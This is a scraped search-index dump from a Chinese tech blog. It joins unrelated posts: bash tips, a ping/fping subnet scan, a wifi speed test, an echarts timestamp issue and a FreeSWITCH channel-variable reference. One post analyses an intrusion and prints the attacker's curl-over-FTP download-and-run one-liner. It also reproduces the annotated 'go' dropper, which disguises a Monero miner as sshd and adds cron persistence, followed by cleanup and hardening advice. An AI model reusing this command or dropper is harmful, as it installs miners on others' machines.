\u0026#39;%s\\n\u0026#39; \u0026#34;${functions[@]//declare -f }\u0026#34; } Bypass shell aliases # alias ls # command # shellcheck disable=SC1001 \\ls Bypass shell functions # function ls # command command ls 后台运行命令 This will run the given command and keep it running, even after the terminal or SSH connection is terminated. All output is ignored.\nbkr() { (nohup \u0026#34;$@\u0026#34; \u0026amp;\u0026gt;/dev/null \u0026amp;) } bkr ./some_script.sh # some_script.sh is now running in the background AFTERWORD Thanks for reading! If this bible helped you in any way and you\u0026rsquo;d like to give back, consider donating. Donations give me the time to make this the best resource possible. Can\u0026rsquo;t donate? That\u0026rsquo;s OK, star the repo and share it with your friends!\n","permalink":"https://wdd.js.org/shell/pure-bash-bible/","summary":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.","title":"pure-bash-bible"},{"content":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.2\n用 fping 去执行,同样 256 个主机,只需要 5-6s\nfping -g 192.168.1.0/24 -r 1 -a -s ","permalink":"https://wdd.js.org/shell/list-active-host/","summary":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.","title":"列出网络中活动的主机"},{"content":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.supportxmr.com门罗币的矿池 # 所以大家应该清楚了,入侵的机器应该用来挖矿的 # 这一步是测试本机与矿池dns是否通 if [ $(ping -c 1 pool.supportxmr.com 2\u0026gt;/dev/null|grep \u0026#34;bytes of data\u0026#34; | wc -l ) -gt \u0026#39;0\u0026#39; ]; then dns=\u0026#34;\u0026#34; # dns通 else dns=\u0026#34;-d\u0026#34; # dns不通 fi # 删除用户计划任务,并将报错信息清除 crontab -r 2\u0026gt;/dev/null # 这一步不太懂 rm -rf /tmp/.lock 2\u0026gt;/dev/null # 设置当前进程的名字,为了掩人耳目,起个sshd, 鱼目混珠 EXEC=\u0026#34;sshd\u0026#34; # 获取当前目录 DIR=`pwd` # 获取参数个数 # 这个程序传了一个 -r 参数,所以$#的值是1 if [ \u0026#34;$#\u0026#34; == \u0026#34;0\u0026#34; ];\tthen ARGS=\u0026#34;\u0026#34; else # 遍历每一个参数 for var in \u0026#34;$@\u0026#34; do if [ \u0026#34;$var\u0026#34; != \u0026#34;-f\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $var\u0026#34; # $var不是-f, 所以ARGS被这是为-r fi if [ ! -z \u0026#34;$FAKEPROC\u0026#34; ];\tthen FAKEPROC=$((FAKEPROC+1)) # 这里不会执行,因为$FAKEPROC是空字符串 fi if [ \u0026#34;$var\u0026#34; == \u0026#34;-h\u0026#34; ];\tthen FAKEPROC=\u0026#34;1\u0026#34; # 这里也不会执行 fi if [[ \u0026#34;$FAKEPROC\u0026#34; == \u0026#34;2\u0026#34; ]];\tthen EXEC=\u0026#34;$var\u0026#34; # 这里也不会执行 fi if [ ! -z \u0026#34;$dns\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $dns\u0026#34; # 如果本机与矿池dns通,则这里不会执行 fi done fi # 创建目录 mkdir -- \u0026#34;.$EXEC\u0026#34; #创建 .sshd目录 cp -f -- `uname -m` \u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; # uname -m获取系统架构,然后判断要把i686还是x86_64拷贝到.sshd目录, 并重命名为sshd ./\u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; $ARGS -f -c # 执行改名后的文件 rm -rf \u0026#34;.$EXEC\u0026#34; # 生成后续执行的脚本 echo \u0026#34;#!/bin/bash cd -- $DIR mkdir -- .$EXEC cp -f -- `uname -m` .$EXEC/$EXEC ./.$EXEC/$EXEC $ARGS -c rm -rf .$EXEC\u0026#34; \u0026gt; \u0026#34;$EXEC\u0026#34; chmod +x -- \u0026#34;$EXEC\u0026#34; # 执行脚本 ./\u0026#34;$EXEC\u0026#34; # 生成计划任务执行脚本 (echo \u0026#34;* * * * * `pwd`/$EXEC\u0026#34;) | sort - | uniq - | crontab - # 删除go脚本 rm -rf go 上文的脚本中,有许多命令后跟着 -- 和 - 这两个参数都是 bash 脚本的内置参数,用来标记命令的内置参数已经结束。\n由于 x86_64 和 i686 是可执行文件,就不分析了。\n恶意文件清除 清除 crontab 定时任务 清除可执行文件。可以 ll /proc/pid/exe , 看下恶意进程的可执行文件位置 kill 恶意程序的进程 修改 root 密码 如何防护 使用强密码,至少 32 位 使用 ssh key 登录 有些脚本会把名字伪装成系统服务,所以不要被进程的名字迷惑,而应该看看这个进程使用的资源是否合理。一个 sshd 的进程,正常来说占用 cpu 和内存不会超过 1%。如果你发现一个占用 CPU%的 sshd 进程,你就要小心这东西是不是滥竽充数了。 ","permalink":"https://wdd.js.org/shell/evil-script/","summary":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.","title":"入侵脚本分析 - 瞒天过海"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/drkxqu/","summary":"","title":"进程实战"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/caytlk/","summary":"","title":"docker slim"},{"content":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。\n","permalink":"https://wdd.js.org/posts/2019/12/mgyw98/","summary":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。","title":"wifi工作模式测试"},{"content":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echars的bug\n解决方案,查询是设置epoch=s, 用unix秒数来格式化事件\n","permalink":"https://wdd.js.org/posts/2019/12/nolg61/","summary":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echars的bug","title":"influxdb时间精度到秒"},{"content":"\nAbout Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.  Click here to expand Table of Contents Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:\n$${variable} is expanded once when FreeSWITCH™ first parses the configuration on startup or after invoking reloadxml. It is suitable for variables that do not change, such as the domain of a single-tenant FreeSWITCH™ server. That is why $${domain} is referenced so frequently in the vanilla dialplan examples. ${variable} is expanded during each pass through the dialplan, so it is used for variables that are expected to change, such as the ${destination_number} or ${sip_to_user} fields. Channel Variables in the XML Dialplan Channel variables are set, appropriately enough, with the set application:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;var_name=var value\u0026rdquo;/\u0026gt; Reading channel variables requires the ${} syntax:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO The value in the var_name chan var is ${var_name}\u0026rdquo;/\u0026gt;\u0026lt;condition field=\u0026quot;${var_name}\u0026quot; expression=\u0026ldquo;some text\u0026rdquo;\u0026gt; Scoped Variables Channel variables used to be global to the session. As of b2c3199f, it is possible to set variables that only exist within a single application execution and any subsequent applications under it. For example, applications can use scoped variables for named input params:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026quot;%[myvar=Hello]INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026quot;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;myapp\u0026rdquo; data=\u0026quot;%[var1=val1,var2=val2]mydata\u0026quot;/\u0026gt; Channel Variables in Dial Strings The variable assignment syntax for dial strings differs depending on which scope they should apply to:\n{foo=bar} is only valid at the beginning of the dial string. It will set the same variables on every channel, but does not do so for enterprise bridging/originate. \u0026lt;foo=bar\u0026gt; is only valid at the beginning of a dial string. It will set the same variables on every channel, including all thos in an enterprise bridging/originate. [foo=bar] goes before each individual dial string and will set the variable values specified for only this channel. ExamplesSet foo variable for all channels implemented and chan=1 will only be set for blah, while chan=2 will only be set for blah2:\n{foo=bar}[chan=1]sofia/default/blah@baz.com,[chan=2]sofia/default/blah2@baz.com Set multiple variables by delimiting with commas:\n[var1=abc,var2=def,var3=ghi]sofia/default/blah@baz.com To have variables in [] override variables in {}, set local_var_clobber=true inside {}. You must also set local_var_clobber=true when you want to override channel variables that have been exported to your b-legs in your dialplan. In this example, the legs for blah1@baz.com and johndoe@example.com would be set to offer SRTP (RTP/SAVP) while janedoe@acme.com would not receive an SRTP offer (she would see RTP/AVP instead):\n{local_var_clobber=true,rtp_secure_media=true}sofia/default/blah1@baz.com|sofia/default/johndoe@example.com|rtp_secure_media=false]sofia/default/janedoe@acme.com Escaping/Redefining Delimiters Commas are the default delimiter inside variable assignment tags. In some cases (like in absolute_codec_string), we may need to define variables whose values contain literal commas that should not be interpreted as delimiters. We can redefine the delimiter for a variable using ^^ followed by the desired delimiter:\n^^;one,two,three;four,five,six;seven,eight,nine To set absolute_codec_string=PCMA@8000h@20i@64000b,PCMU@8000h@20i@64000b,G729@8000h@20i@8000b in a dial string:\n{absolute_codec_string=^^:PCMA@8000h@20i@64000b:PCMU@8000h@20i@64000b:G729@8000h@20i@8000b,leg_time_out=10,process_cdr=b_only} This approach does not work when setting sip_h_, sip_rh_, and sip_ph headers. To pass a comma into the contents of a private header, escape the comma with a backslash:\n{sip_h_X-My-Header=one\\,two\\,three,leg_time_out=10,process_cdr=b_only} Exporting Channel Variables in Bridge Operations Variables from one call leg (A) can be exported to the other call leg (B) by using the export_vars variable. Its value is a comma separated list of variables that should propagate across calls.\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;export_vars=myvar,myvar2,foo,bar\u0026rdquo;/\u0026gt; To set a variable on the A-leg and add it to the export list, use the export application:\n\u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;myvar=true\u0026rdquo;/\u0026gt; Using Channel Variables in Dialplan Condition Statements Channel variables can be used in conditions, refer to XML Dialplan Conditions for more information. Some channel variables may not be set during the dialplan parsing phrase. See Inline Actions. Custom Channel Variables We are not constrained to the channel variables that FreeSWITCH™, its modules, and applications define. It is possible to set any number of unique channel variables for any purpose. They can also be logged in CDR. The set application can be used to set any channel variable:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718b\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;campaign_id=333814\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;crm_tags=referral new loyal\u0026rdquo; /\u0026gt; In a command issued via mod_xml_rpc or mod_event_socket:\noriginate {lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718,campaign_id=333814}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Values with spaces must be enclosed by quotes:\noriginate {crm_tags=\u0026lsquo;referral new loyal'}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Channel Variable Manipulation Channel variables can be manipulated for varied results. For example, a channel variable could be trimmed to get the first three digits of a phone number. Manipulating Channel Variables discusses this in detail. Channel Variable Scope Example Consider this example:\n\u0026lt;extension name=\u0026ldquo;test\u0026rdquo; continue=\u0026ldquo;false\u0026rdquo;\u0026gt; \u0026lt;condition field=\u0026ldquo;destination_number\u0026rdquo; expression=\u0026quot;^test([0-9]+)$\u0026quot;\u0026gt; \u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;fruit=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;veggie=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;bridge\u0026rdquo; data=\u0026quot;{meat=tomato}sofia/gateway/testaccount/1234\u0026quot; /\u0026gt; \u0026lt;/condition\u0026gt;\u0026lt;/extension\u0026gt; Leg A (the channel that called the dial plan) will have these variables set:\nfruit: tomatoveggie: tomato Leg B (the channel created with sofia/gateway/testaccount/1234) will have these variables set:\nfruit: tomatomeat: tomato Accessing Channel Variables in Other Environments In addition to the dialplan, channel variables can be set in other environments as well.In a FreeSWITCH™ module, written in C:\nswitch_channel_set_variable(channel,\u0026ldquo;name\u0026rdquo;,\u0026ldquo;value\u0026rdquo;);char* result = switch_channel_get_variable(channel,\u0026ldquo;name\u0026rdquo;); char* result = switch_channel_get_variable_partner(channel,\u0026ldquo;name\u0026rdquo;); In the console (or fs_cli, implemented in mod_commands): uuid_getvar uuid_setvar []uuid_setvar_multi =[;=[;\u0026hellip;]] Alternatively, call uuid_dump to get all the variables, or use the eval command, adding the prefix variable_ to the key:\nuuid_dump eval uuid: ${variable_} In an event socket, just extend the above with the api prefix:\napi uuid_getvar In Lua, there are several ways to interact with variables. In the freeswitch.Session() invocation that creates a new Session object, variables go in square brackets:\ns = freeswitch.Session(\u0026quot;[myname=myvars]sofia/localhost/1003\u0026quot;) With the new Session object s:\nlocal result1 = s:getVariable(\u0026ldquo;myname\u0026rdquo;) \u0026ndash; \u0026ldquo;myvars\u0026rdquo;s:setVariable(\u0026ldquo;name\u0026rdquo;, \u0026ldquo;value\u0026rdquo;)local result2 = s:getVariable(\u0026ldquo;name\u0026rdquo;) \u0026ndash; \u0026ldquo;value\u0026rdquo; Info Application Variable Names (variable_xxxx) Some variables, as shown from the info app, may have variable_ in front of their names. For example, if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}. Other variables shown in the info app are prepended with channel, which should be stripped as well. The example below show a list of info app variables and the corresponding channel variable names:\nInfo variable name channel variable name Description Channel-State state Current state of the call Channel-State-Number state_number Integer Channel-Name channel_name Channel name Unique-ID uuid uuid of this channel\u0026rsquo;s call leg Call-Direction direction Inbound or Outbound Answer-State state - Channel-Read-Codec-Name read_codec the read codec variable mean the source codec Channel-Read-Codec-Rate read_rate the source rate Channel-Write-Codec-Name write_codec the destination codec same to write_codec if not transcoded Channel-Write-Codec-Rate write_rate destination rate same to read rate if not transcoded Caller-Username username . Caller-Dialplan dialplan user dialplan like xml, lua, enum, lcr Caller-Caller-ID-Name caller_id_name . Caller-Caller-ID-Number caller_id_number . Caller-ANI ani ANI of caller, frequently the same as caller ID number Caller-ANI-II aniii ANI II Digits (OLI - Originating Line Information), if available. Refer to: http://www.nanpa.com/number_resource_info/ani_ii_digits.html Caller-Network-Addr network_addr IP address of calling party Caller-Destination-Number destination_number Destination (dialed) number Caller-Unique-ID uuid This channel\u0026rsquo;s uuid Caller-Source source Source module, i.e. mod_sofia, mod_openzap, etc. Caller-Context context Dialplan context Caller-RDNIS rdnis Redirected DNIS info. See mod_dptools: transfer application Caller-Channel-Name channel_name . Caller-Profile-Index profile_index . Caller-Channel-Created-Time created_time . Caller-Channel-Answered-Time answered_time . Caller-Channel-Hangup-Time hangup_time . Caller-Channel-Transfer-Time transfer_time . Caller-Screen-Bit screen_bit . Caller-Privacy-Hide-Name privacy_hide_name . Caller-Privacy-Hide-Number privacy_hide_number This variable tells you if the inbound call is asking for CLIR[Calling Line ID presentation Restriction] (either with anonymous method or Privacy:id method) initial_callee_id_name Sets the callee id name during the 183. This allows the phone to see a name of who they are calling prior to the phone being answered. An example of setting this to the caller id name of the number being dialled: variable_sip_received_ip sip_received_ip . variable_sip_received_port sip_received_port . variable_sip_authorized sip_authorized . variable_sip_mailbox sip_mailbox . variable_sip_auth_username sip_auth_username . variable_sip_auth_realm sip_auth_realm . variable_mailbox mailbox . variable_user_name user_name . variable_domain_name domain_name . variable_record_stereo record_stereo . variable_accountcode accountcode Accountcode for the call. This is an arbitrary value. It can be defined in the user variables in the directory, or it can be set/modified from dialplan. The accountcode may be used to force a specific CDR CSV template for the call. variable_user_context user_context . variable_effective_caller_id_name effective_caller_id_name . variable_effective_caller_id_number effective_caller_id_number . variable_caller_domain caller_domain . variable_sip_from_user sip_from_user . variable_sip_from_uri sip_from_uri . variable_sip_from_host sip_from_host . variable_sip_from_user_stripped sip_from_user_stripped . variable_sip_from_tag sip_from_tag . variable_sofia_profile_name sofia_profile_name . variable_sofia_profile_domain_name sofia_profile_domain_name . variable_sip_full_route sip_full_route The complete contents of the Route: header. variable_sip_full_via sip_full_via The complete contents of the Via: header. variable_sip_full_from sip_full_from The complete contents of the From: header. variable_sip_full_to sip_full_to The complete contents of the To: header. variable_sip_req_params sip_req_params . variable_sip_req_user sip_req_user . variable_sip_req_uri sip_req_uri . variable_sip_req_host sip_req_host . variable_sip_to_params sip_to_params . variable_sip_to_tag sip_to_tag . variable_sip_to_user sip_to_user . variable_sip_to_uri sip_to_uri . variable_sip_to_host sip_to_host . variable_sip_contact_params sip_contact_params . variable_sip_contact_user sip_contact_user . variable_sip_contact_port sip_contact_port . variable_sip_contact_uri sip_contact_uri . variable_sip_contact_host sip_contact_host . variable_sip_invite_domain sip_invite_domain . variable_channel_name channel_name . variable_sip_call_id sip_call_id SIP header Call-ID variable_sip_user_agent sip_user_agent . variable_sip_via_host sip_via_host . variable_sip_via_port sip_via_port . variable_sip_via_rport sip_via_rport . variable_presence_id presence_id . variable_sip_h_P-Key-Flags sip_h_p-key-flags This will contain the optional P-Key-Flags header(s) that may be received from calling endpoint. variable_switch_r_sdp switch_r_sdp The whole SDP received from calling endpoint. variable_remote_media_ip remote_media_ip . variable_remote_media_port remote_media_port . variable_write_codec write_codec . variable_write_rate write_rate . variable_endpoint_disposition endpoint_disposition . variable_dialed_ext dialed_ext . variable_transfer_ringback transfer_ringback . variable_call_timeout call_timeout . variable_hangup_after_bridge hangup_after_bridge . variable_continue_on_fail continue_on_fail . variable_dialed_user dialed_user . variable_dialed_domain dialed_domain . variable_sip_redirect_contact_user_0 sip_redirect_contact_user_0 . variable_sip_redirect_contact_host_0 sip_redirect_contact_host_0 . variable_sip_h_Referred-By sip_h_referred-by . variable_sip_refer_to sip_refer_to The full SIP URI received from a SIP Refer-To: response variable_max_forwards max_forwards . variable_originate_disposition originate_disposition . variable_read_codec read_codec . variable_read_rate read_rate . variable_open open . variable_use_profile use_profile . variable_current_application current_application . variable_ep_codec_string ep_codec_string This variable is only available if late negotiation is enabled on the profile. It\u0026rsquo;s a readable string containing all the codecs proposed by the calling endpoint. This can be easily parsed in the dialplan. variable_rtp_disable_hold rtp_disable_hold This variable when set will disable the hold feature of the phone. variable_sip_acl_authed_by sip_acl_authed_by This variable holds what ACL rule allowed the call. variable_curl_response_data curl_response_data This variable stores the output from the last curl made. variable_drop_dtmf drop_dtmf Set on a channel to drop DTMF events on the way out. variable_drop_dtmf_masking_file drop_dtmf_masking_file If drop_dtmf is true play specified file for every tone received. variable_drop_dtmf_masking_digits drop_dtmf_masking_digits If drop_dtmf is true play specified tone for every tone received. sip_codec_negotiation sip_codec_negotiation sip_codec_negotiation is basically a channel variable equivalent of inbound-codec-negotiation.sip_codec_negotiation accepts \u0026ldquo;scrooge\u0026rdquo; \u0026amp; \u0026ldquo;greedy\u0026rdquo; as values.This means you can change codec negotiation on a per call basis. Caller-Callee-ID-Name - - Caller-Callee-ID-Number - - Caller-Channel-Progress-Media-Time - - Caller-Channel-Progress-Time - - Caller-Direction - - Caller-Profile-Created-Time profile_created - Caller-Transfer-Source - - Channel-Call-State - - Channel-Call-UUID - - Channel-HIT-Dialplan - - Channel-Read-Codec-Bit-Rate - - Channel-Write-Codec-Bit-Rate - - Core-UUID - - Event-Calling-File - - Event-Calling-Function - - Event-Calling-Line-Number - - Event-Date-GMT - - Event-Date-Local - - Event-Date-Timestamp - - Event-Name - - Event-Sequence - - FreeSWITCH-Hostname - - FreeSWITCH-IPv4 - - FreeSWITCH-IPv6 - - FreeSWITCH-Switchname - - Hunt-ANI - - Hunt-Callee-ID-Name - - Hunt-Callee-ID-Number - - Hunt-Caller-ID-Name - - Hunt-Caller-ID-Number - - Hunt-Channel-Answered-Time - - Hunt-Channel-Created-Time - - Hunt-Channel-Hangup-Time - - Hunt-Channel-Name - - Hunt-Channel-Progress-Media-Time - - Hunt-Channel-Progress-Time - - Hunt-Channel-Transfer-Time - - Hunt-Context - - Hunt-Destination-Number - - Hunt-Dialplan - - Hunt-Direction - - Hunt-Network-Addr - - Hunt-Privacy-Hide-Name - - Hunt-Privacy-Hide-Number - - Hunt-Profile-Created-Time profile_created - Hunt-Profile-Index - - Hunt-RDNIS - - Hunt-Screen-Bit - - Hunt-Source - - Hunt-Transfer-Source - - Hunt-Unique-ID - - Hunt-Username - - Presence-Call-Direction - - variable_DIALSTATUS - - variable_absolute_codec_string - - variable_advertised_media_ip - - variable_answersec variable_answermsec variable_answerusec variable_billsec variable_billmsec variable_billusec variable_bridge_channel - - variable_bridge_hangup_cause - - variable_bridge_uuid - - variable_call_uuid - - variable_current_application_response - - variable_direction - - variable_duration variable_mduration variable_uduration variable_inherit_codec - - variable_is_outbound - - variable_last_bridge_to - - variable_last_sent_callee_id_name - - variable_last_sent_callee_id_number - - variable_local_media_ip - - variable_local_media_port - - variable_number_alias - - variable_originate_early_media - - variable_originating_leg_uuid - - variable_originator - - variable_originator_codec - - variable_outbound_caller_id_number - - variable_progresssec variable_progressmsec variable_progressusec variable_progress_mediasec variable_progress_mediamsec variable_progress_mediausec variable_recovery_profile_name - - variable_rtp_use_ssrc - - variable_session_id - - variable_sip_2833_recv_payload - - variable_sip_2833_send_payload - - variable_sip_P-Asserted-Identity - - variable_sip_Privacy - - variable_sip_audio_recv_pt - - variable_sip_cid_type - - variable_sip_cseq - - variable_sip_destination_url - - variable_sip_from_display sip_from_display \u0026lsquo;User\u0026rsquo; element of SIP From: line variable_sip_from_port - - variable_sip_gateway - - variable_sip_gateway_name - - variable_sip_h_P-Charging-Vector - - variable_sip_local_network_addr - - variable_sip_local_sdp_str - - variable_sip_network_ip - - variable_sip_network_port - - variable_sip_number_alias - - variable_sip_outgoing_contact_uri - - variable_sip_ph_P-Charging-Vector - - variable_sip_profile_name - - variable_sip_recover_contact - - variable_sip_recover_via - - variable_sip_reply_host - - variable_sip_reply_port - - variable_sip_req_port - - variable_sip_to_port - - variable_sip_use_codec_name - - variable_sip_use_codec_ptime - - variable_sip_use_codec_rate - - variable_sip_use_pt - - variable_sip_via_protocol - - variable_switch_m_sdp - - variable_transfer_history - - variable_transfer_source - - variable_uuid - - variable_waitsec variable_waitmsec variable_waitusec ","permalink":"https://wdd.js.org/freeswitch/channel-var-list/","summary":"About Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.  Click here to expand Table of Contents Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:","title":"通道变量列表"},{"content":"\nUsage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for. See mod_dptools for a list of dialplan applications, they are quite extensive. Extraction Script Mitch Capper wrote a Perl script to extract commands from mod_commands source code. It\u0026rsquo;s tailored specifically for extracting from mod_commands but should work for most other files.Extraction Perl Script#!/usr/bin/perluse strict;open (fl,\u0026ldquo;src/mod/applications/mod_commands/mod_commands.c\u0026rdquo;);my $cont;{ local $/ = undef; 